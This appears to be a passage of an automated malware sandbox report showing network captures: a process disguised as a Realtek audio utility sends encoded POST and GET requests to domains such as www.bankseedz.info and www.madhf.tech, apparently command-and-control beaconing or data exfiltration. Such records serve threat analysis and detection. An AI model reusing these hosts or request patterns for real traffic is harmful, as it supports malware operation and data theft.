                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              11192.168.11.204976946.30.211.38806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:55:34.914025068 CET2578OUTPOST /uf7y/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.bankseedz.info
                                                                                                                                                                              Origin: http://www.bankseedz.info
                                                                                                                                                                              Referer: http://www.bankseedz.info/uf7y/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 61 2b 2f 52 37 67 33 38 73 65 78 6f 35 2b 49 56 63 4a 30 38 53 56 4a 79 32 50 6f 44 6d 32 33 31 6e 6c 37 68 4e 68 7a 55 6e 59 47 76 55 6f 6e 64 71 72 7a 70 4e 6b 45 32 32 45 48 54 58 51 67 4a 41 6f 32 74 6a 2b 38 41 61 5a 57 72 75 6e 30 66 6b 38 55 77 69 59 70 4a 6a 65 53 49 4f 45 4a 58 47 51 55 69 35 6c 4e 4c 39 51 48 42 58 4b 62 32 48 47 33 6a 78 65 31 4e 79 5a 67 6c 64 6d 32 62 71 59 59 4a 6d 70 78 4d 35 31 51 6d 4b 54 69 36 35 35 42 4b 64 2b 47 38 65 4b 75 4f 55 61 49 38 6b 48 70 68 53 68 37 46 64 67 42 59 6e 52 44 48 33 52 51 48 33 79 51 75 50 39 39 56 4d 57 6b 61 77 33 51 64 56 4f 51 59 30 59 47 6c 65 36 4c 6e 6d 44 6f 58 72 7a 55 35 45 73 57 59 47 6c 64 64 38 2f 69 5a 69 7a 36 79 7a 30 6c 4e 32 2f 50 66 76 79 69 56 6c 79 6f 4f 59 7a 42 39 70 67 46 63 46 75 77 44 42 58 6e 33 4e 46 4c 69 68 37 46 59 4a 2f 68 4e 34 79 74 52 34 46 30 39 47 64 41 59 62 2f 52 68 56 72 71 61 56 44 73 41 52 32 75 55 48 55 47 56 32 47 69 68 49 4c 4d 69 30 53 31 70 72 57 49 6b 78 46 52 52 66 74 6a 42 61 49 35 [TRUNCATED]
                                                                                                                                                                              Data Ascii: iS=a+/R7g38sexo5+IVcJ08SVJy2PoDm231nl7hNhzUnYGvUondqrzpNkE22EHTXQgJAo2tj+8AaZWrun0fk8UwiYpJjeSIOEJXGQUi5lNL9QHBXKb2HG3jxe1NyZgldm2bqYYJmpxM51QmKTi655BKd+G8eKuOUaI8kHphSh7FdgBYnRDH3RQH3yQuP99VMWkaw3QdVOQY0YGle6LnmDoXrzU5EsWYGldd8/iZiz6yz0lN2/PfvyiVlyoOYzB9pgFcFuwDBXn3NFLih7FYJ/hN4ytR4F09GdAYb/RhVrqaVDsAR2uUHUGV2GihILMi0S1prWIkxFRRftjBaI5NlMtsTxL80LGa9XfZodUUKAw9wecK0G6Bhl1vMaxm5glg3RDBvZplqHDNBZsVUkHBYd2+F0oaunxUkn44eiT8FRFCZmGAA3637UlJDr0HUJqr45BKAtUkb95M3tqJ5OSeFzn2lbmYJw+Jkk1CMX+KRhqP68QexGyIKvF4tzf28lO3Q4bknuSfPv5Psv/sSKG8tJB1WGwX2VtuSCVsHwl1yCbbl4pDK40QJ0rVRio/RHS8NMTHCVdMrwd8aBf+21eea8ZCIbKkXnmVJIaY925vYAhZZmAFqDEzag+xuIWhtJDVGKm1HO3H5PLC1ZjBvNvsN3GFdfPjSQu9CaDmgt5VRBZe5+r5KizFYBbbvnwqaICf0fJncqUBQfm9O78vy8gKStIPt/ub8FhQNua2BY4p+SLTCvb9jHZVg7wLInFYPBDK1qjN7Y7Q1EsRwZuRj882cpymHvZyGGoOnZMOMTkYCwHeiZs4xYdRjFcme4Bqtvx5cnncFKWdOVt25NXUqtxD/LoCGQQe1hvVxGo9sI1AwvH2I7LdfzMOHR24HYRYc+RLJXSevKocgKX6Kr4U6JF8MKD9dzQQnI+EnvRaxAwPVtdP7+HwVCCa6kUa04XFtOXlHKbqI8OYdRKCcJXQ972JFrYFQ4bLB3RYnvpyigq3Db8pxP63dS3a6 [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 03:55:34.914060116 CET5156OUTData Raw: 61 46 4f 63 7a 2f 61 73 7a 76 43 47 45 4c 66 67 76 35 52 48 6c 4d 74 2b 39 66 6c 4b 72 58 50 6c 69 4b 64 4c 31 4a 4f 62 39 45 2b 4e 5a 4c 31 6f 57 59 69 65 75 6f 79 42 7a 79 45 45 55 4b 4c 69 42 68 70 71 6c 39 61 78 66 6f 65 72 56 62 33 6b 44 55
                                                                                                                                                                              Data Ascii: aFOcz/aszvCGELfgv5RHlMt+9flKrXPliKdL1JOb9E+NZL1oWYieuoyBzyEEUKLiBhpql9axfoerVb3kDUbvjQoEvpQYQbWNj1eaWR75i4mzsF3XEEUBbDfJ7SNXJ6vKbhjepBEMIyADgbJFwws1XfGO0KALshh7YoHukS2bFEFNVlTi9vOX67BUhOQXEXrXlbLSEjnX6oU1cKq13YEUsEKM69xh1jKDF4Brh6geVfKakDKxABW
                                                                                                                                                                              Jan 11, 2025 03:55:34.914129019 CET196OUTData Raw: 52 71 36 38 7a 64 6b 2b 4a 4f 6d 64 62 67 41 73 6a 44 53 67 52 36 52 54 44 4c 59 61 61 6c 45 75 7a 6d 74 75 42 52 4c 32 4d 56 32 44 2f 54 55 34 37 65 77 61 34 59 75 76 66 72 4e 39 7a 68 68 49 6e 2b 62 77 74 52 76 79 33 63 35 32 65 54 38 66 47 71
                                                                                                                                                                              Data Ascii: Rq68zdk+JOmdbgAsjDSgR6RTDLYaalEuzmtuBRL2MV2D/TU47ewa4YuvfrN9zhhIn+bwtRvy3c52eT8fGqqQ+WJclfJGdJOVmts+Y59ja53rmdV41ZcB/qFYDvRFGdLlq9+t5hMdZdbZw+sLKcsi0iykj+zA0FHLEPXIa1azwN4uAoJIM2sNVM7cx2OrQf5/7Q==
                                                                                                                                                                              Jan 11, 2025 03:55:35.139514923 CET738INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:55:35 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Content-Length: 564
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              12192.168.11.204977046.30.211.38806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:55:37.658776045 CET489OUTGET /uf7y/?iS=X8Xx4Xb3zOwIp/YkPeQkR0guwoAt7ELtmVzPPBr+rNKRcobOh5vjSVYUxnTRN3k+HcX7svN7WZWipHk078Y7lpE6s8+6fnJkBTwA9zJT+z2YULyhD3K67+Y=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.bankseedz.info
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 03:55:37.880767107 CET738INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:55:37 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Content-Length: 564
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              13192.168.11.2049771103.224.182.242806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:55:43.255373001 CET749OUTPOST /3iym/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.madhf.tech
                                                                                                                                                                              Origin: http://www.madhf.tech
                                                                                                                                                                              Referer: http://www.madhf.tech/3iym/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 73 68 52 49 6d 55 4e 4c 43 44 36 79 6b 6b 48 4a 30 70 72 50 61 4b 7a 76 66 53 66 4e 46 42 50 30 72 4a 66 34 7a 6c 79 58 69 37 6f 77 4d 68 4f 31 6b 38 53 2f 42 49 79 63 6b 68 69 4c 66 31 66 52 34 63 66 36 64 45 68 68 79 71 61 7a 70 39 35 6c 34 69 6d 34 2b 62 33 69 2b 5a 74 6e 47 53 61 66 51 7a 59 6d 67 69 32 61 47 4e 4d 2f 64 4d 35 7a 66 72 4e 62 42 79 75 31 65 6a 6b 69 78 34 69 4b 33 64 52 69 79 48 4e 51 6a 78 2b 51 53 51 68 41 43 74 6d 66 38 6b 47 75 74 54 5a 30 55 70 33 52 73 56 4a 53 30 4e 59 58 62 47 48 63 6f 4d 70 7a 37 37 67 78 75 57 78 38 66 46 53 6d 66 37 78 58 79 67 3d 3d
                                                                                                                                                                              Data Ascii: iS=shRImUNLCD6ykkHJ0prPaKzvfSfNFBP0rJf4zlyXi7owMhO1k8S/BIyckhiLf1fR4cf6dEhhyqazp95l4im4+b3i+ZtnGSafQzYmgi2aGNM/dM5zfrNbByu1ejkix4iK3dRiyHNQjx+QSQhACtmf8kGutTZ0Up3RsVJS0NYXbGHcoMpz77gxuWx8fFSmf7xXyg==
                                                                                                                                                                              Jan 11, 2025 03:55:43.439430952 CET871INHTTP/1.1 200 OK
                                                                                                                                                                              date: Sat, 11 Jan 2025 02:55:43 GMT
                                                                                                                                                                              server: Apache
                                                                                                                                                                              set-cookie: __tad=1736564143.3375901; expires=Tue, 09-Jan-2035 02:55:43 GMT; Max-Age=315360000
                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                              content-length: 576
                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                              connection: close
                                                                                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 [TRUNCATED]
                                                                                                                                                                              Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              14192.168.11.2049772103.224.182.242806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:55:45.949315071 CET769OUTPOST /3iym/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.madhf.tech
                                                                                                                                                                              Origin: http://www.madhf.tech
                                                                                                                                                                              Referer: http://www.madhf.tech/3iym/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 73 68 52 49 6d 55 4e 4c 43 44 36 79 6b 45 33 4a 31 4b 7a 50 62 71 7a 73 52 79 66 4e 54 78 50 77 72 4f 58 34 7a 6b 32 48 69 74 77 77 4d 44 57 31 6e 2b 71 2f 55 49 79 63 73 42 6a 44 62 31 65 64 34 63 54 63 64 41 39 68 79 71 2b 7a 70 39 4a 6c 34 31 79 35 6b 72 33 6b 32 35 74 6c 4c 79 61 66 51 7a 59 6d 67 6d 66 53 47 4e 30 2f 63 38 4a 7a 65 4b 4e 59 4a 53 75 32 64 6a 6b 69 6e 34 6a 42 33 64 52 63 79 46 70 36 6a 7a 32 51 53 53 70 41 43 2f 4f 59 32 6b 47 6f 77 44 59 4c 51 34 65 4e 68 48 77 6b 38 74 77 51 56 56 36 6e 67 36 6b 70 6d 4a 55 56 74 46 74 4f 62 31 72 4f 64 35 77 4d 76 68 6d 61 2f 34 4d 4b 76 45 37 4f 39 30 36 42 74 71 55 31 49 2f 67 3d
                                                                                                                                                                              Data Ascii: iS=shRImUNLCD6ykE3J1KzPbqzsRyfNTxPwrOX4zk2HitwwMDW1n+q/UIycsBjDb1ed4cTcdA9hyq+zp9Jl41y5kr3k25tlLyafQzYmgmfSGN0/c8JzeKNYJSu2djkin4jB3dRcyFp6jz2QSSpAC/OY2kGowDYLQ4eNhHwk8twQVV6ng6kpmJUVtFtOb1rOd5wMvhma/4MKvE7O906BtqU1I/g=
                                                                                                                                                                              Jan 11, 2025 03:55:46.130961895 CET871INHTTP/1.1 200 OK
                                                                                                                                                                              date: Sat, 11 Jan 2025 02:55:46 GMT
                                                                                                                                                                              server: Apache
                                                                                                                                                                              set-cookie: __tad=1736564146.2518747; expires=Tue, 09-Jan-2035 02:55:46 GMT; Max-Age=315360000
                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                              content-length: 576
                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                              connection: close
                                                                                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 [TRUNCATED]
                                                                                                                                                                              Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              15192.168.11.2049773103.224.182.242806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:55:48.651704073 CET1289OUTPOST /3iym/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.madhf.tech
                                                                                                                                                                              Origin: http://www.madhf.tech
                                                                                                                                                                              Referer: http://www.madhf.tech/3iym/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 73 68 52 49 6d 55 4e 4c 43 44 36 79 6b 45 33 4a 31 4b 7a 50 62 71 7a 73 52 79 66 4e 54 78 50 77 72 4f 58 34 7a 6b 32 48 69 74 34 77 50 77 65 31 6e 5a 47 2f 53 34 79 63 76 42 6a 41 62 31 66 48 34 63 37 59 64 48 31 78 79 6f 32 7a 6d 2b 78 6c 70 30 79 35 71 62 33 6b 30 35 74 6d 47 53 61 77 51 7a 4a 68 67 69 7a 53 47 4e 30 2f 63 2b 42 7a 4f 72 4e 59 45 79 75 31 65 6a 6b 6d 78 34 6a 70 33 64 59 6e 79 46 73 50 6a 41 4f 51 52 79 5a 41 42 4c 75 59 30 45 47 71 78 44 59 54 51 34 43 6b 68 48 39 62 38 74 55 36 56 58 61 6e 6c 37 45 7a 31 4b 78 4c 34 44 56 33 62 78 53 74 57 70 59 50 76 68 76 6a 37 62 51 49 6c 43 72 62 2b 30 43 57 36 4a 38 4e 64 49 76 2f 65 70 48 5a 5a 41 44 71 46 56 4b 51 49 36 56 36 42 52 67 6e 54 75 39 56 53 51 46 5a 4d 53 67 54 4f 79 46 32 44 4e 67 53 33 50 30 79 4b 68 56 35 42 6e 35 5a 61 49 71 4d 63 33 44 30 30 48 66 32 75 39 76 2b 36 7a 53 67 49 35 2b 71 6d 76 56 44 55 6c 4c 67 58 34 6a 57 4b 62 78 48 44 69 46 73 4d 30 51 77 6e 48 7a 59 62 61 37 58 44 75 78 4f 6a 36 79 72 38 35 34 [TRUNCATED]
                                                                                                                                                                              Data Ascii: iS=shRImUNLCD6ykE3J1KzPbqzsRyfNTxPwrOX4zk2Hit4wPwe1nZG/S4ycvBjAb1fH4c7YdH1xyo2zm+xlp0y5qb3k05tmGSawQzJhgizSGN0/c+BzOrNYEyu1ejkmx4jp3dYnyFsPjAOQRyZABLuY0EGqxDYTQ4CkhH9b8tU6VXanl7Ez1KxL4DV3bxStWpYPvhvj7bQIlCrb+0CW6J8NdIv/epHZZADqFVKQI6V6BRgnTu9VSQFZMSgTOyF2DNgS3P0yKhV5Bn5ZaIqMc3D00Hf2u9v+6zSgI5+qmvVDUlLgX4jWKbxHDiFsM0QwnHzYba7XDuxOj6yr8547dMbm3Sd7TlcmZhywWzB+PNKHa3bbf8JKCuShGJWHD5gnNRYm9cq8DVM3cDIVTULY/yjaVzfE9AjS8RJx0zzMQry8A127DMgjvBH16yYV4rLK9EI1xHOJDUJ9USpsY4Dc/v6bfi96o2tNX94On+X7q0gDi3suIC7XM4Dj4Urdx3PiVyi1Wl7rqJzlGuEsjocWMfuperkBu0LcD3kJBB7LqZE6nqxaEHqbzVy3Eq7z/YDdF1c0M/sE5LoBfJgV5QSYSuCzFZWcw4PSXIRsMX89trNMlK0y4/GgXl+JHCVtUNq4nSR5azjl6Cwa4i8Ssu7iinPaFaoBbJ2iiRDn53NVNXdL5ZTGNYKlcTdOn5bE0+NRk65qKvXf50dNqgrEnCZ8CCHxJkO9FcVoAIi
                                                                                                                                                                              Jan 11, 2025 03:55:48.651751995 CET1289OUTData Raw: 75 57 67 76 78 56 44 30 38 58 5a 50 51 6f 4d 7a 4b 30 46 6f 65 36 65 34 6e 63 53 51 74 65 6a 75 4b 36 2f 6c 36 47 57 36 79 42 6a 37 30 6f 34 45 57 6c 2b 39 64 61 33 50 6e 30 53 70 68 2b 32 30 2f 6e 62 39 38 38 6c 68 74 69 6c 59 64 76 75 61 58 51
                                                                                                                                                                              Data Ascii: uWgvxVD08XZPQoMzK0Foe6e4ncSQtejuK6/l6GW6yBj70o4EWl+9da3Pn0Sph+20/nb988lhtilYdvuaXQqQd4QFoQB+iiVVhx/ujNjPtxbftgALAuc888ISkw9RjrbQsGqy7oGNA0KEi90MwmgNxCcyG2yzUS9W/Prd+5OjWN0ZS3QbLugiRpPNyVsRhwPOxFQJVqc70tWWvTZmF+ecOBy0hgOFAQCUzpKg+8Ll2GaOkjLtakV
                                                                                                                                                                              Jan 11, 2025 03:55:48.651813030 CET5340OUTData Raw: 75 74 59 43 69 4c 50 36 7a 72 63 62 53 79 52 31 45 73 4e 73 49 41 6e 45 52 47 41 70 62 70 63 70 30 4e 6d 70 31 55 36 57 32 4a 79 61 42 63 54 64 79 48 56 38 66 73 48 58 31 4c 61 73 42 49 2b 37 30 36 78 49 34 37 64 55 76 37 79 51 6f 34 30 73 69 52
                                                                                                                                                                              Data Ascii: utYCiLP6zrcbSyR1EsNsIAnERGApbpcp0Nmp1U6W2JyaBcTdyHV8fsHX1LasBI+706xI47dUv7yQo40siRgOxhhjDLgD2vwfAYQoE4ETicVsBQrIo5A7+En3hwUxRQK4CQITgWxEIivul6yeLRZXovDfGn+DX+9xuSk0i+1mjXzvl3ejHisLavFndgfN911DLJhZz4e26IIoq3sKLO4qByKn6JXTSZ1Hi1DKrkIZAUIzNVucHXv
                                                                                                                                                                              Jan 11, 2025 03:55:48.839473963 CET871INHTTP/1.1 200 OK
                                                                                                                                                                              date: Sat, 11 Jan 2025 02:55:48 GMT
                                                                                                                                                                              server: Apache
